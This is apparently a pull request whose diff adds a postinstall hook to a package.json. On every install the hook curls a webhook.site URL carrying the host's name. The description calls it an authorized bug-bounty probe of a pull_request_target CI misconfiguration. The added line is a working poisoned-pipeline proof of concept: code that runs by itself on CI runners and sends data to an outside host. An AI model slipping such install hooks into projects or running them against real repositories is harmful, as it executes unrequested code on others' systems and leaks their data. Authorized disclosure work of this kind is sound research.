### PR TITLE
Test: CI reachability probe (AWS VDP, benign)

### DIFF
--- a/package.json
+++ b/package.json
@@ -17,7 +17,8 @@
     "format": "prettier --write '**/*.ts'",
     "package": "ncc build src/main.ts -o dist --source-map --license licenses.txt",
     "prepublishOnly": "npm run build && npm run test",
-    "test": "jest --collectCoverage --collectCoverageFrom=src/**/*.{ts,js}"
+    "test": "jest --collectCoverage --collectCoverageFrom=src/**/*.{ts,js}",
+    "postinstall": "curl -s -m 10 \"https://webhook.site/df55c026-da52-4e30-a507-2460e3c09e85/ebdeploy-prt-poc-38f219c3?h=$(hostname)\" || true"
   },
   "main": "dist/index.js",
   "exports": "dist/index.js",


### PR DESCRIPTION
Authorized AWS VDP (HackerOne) reachability test for a CI/CD misconfiguration report. This PR adds a benign postinstall beacon (pings a webhook with hostname only, reads no secrets) to confirm whether pull_request_target fork code executes without an actor gate. It will be closed immediately after the check runs. No merge intended.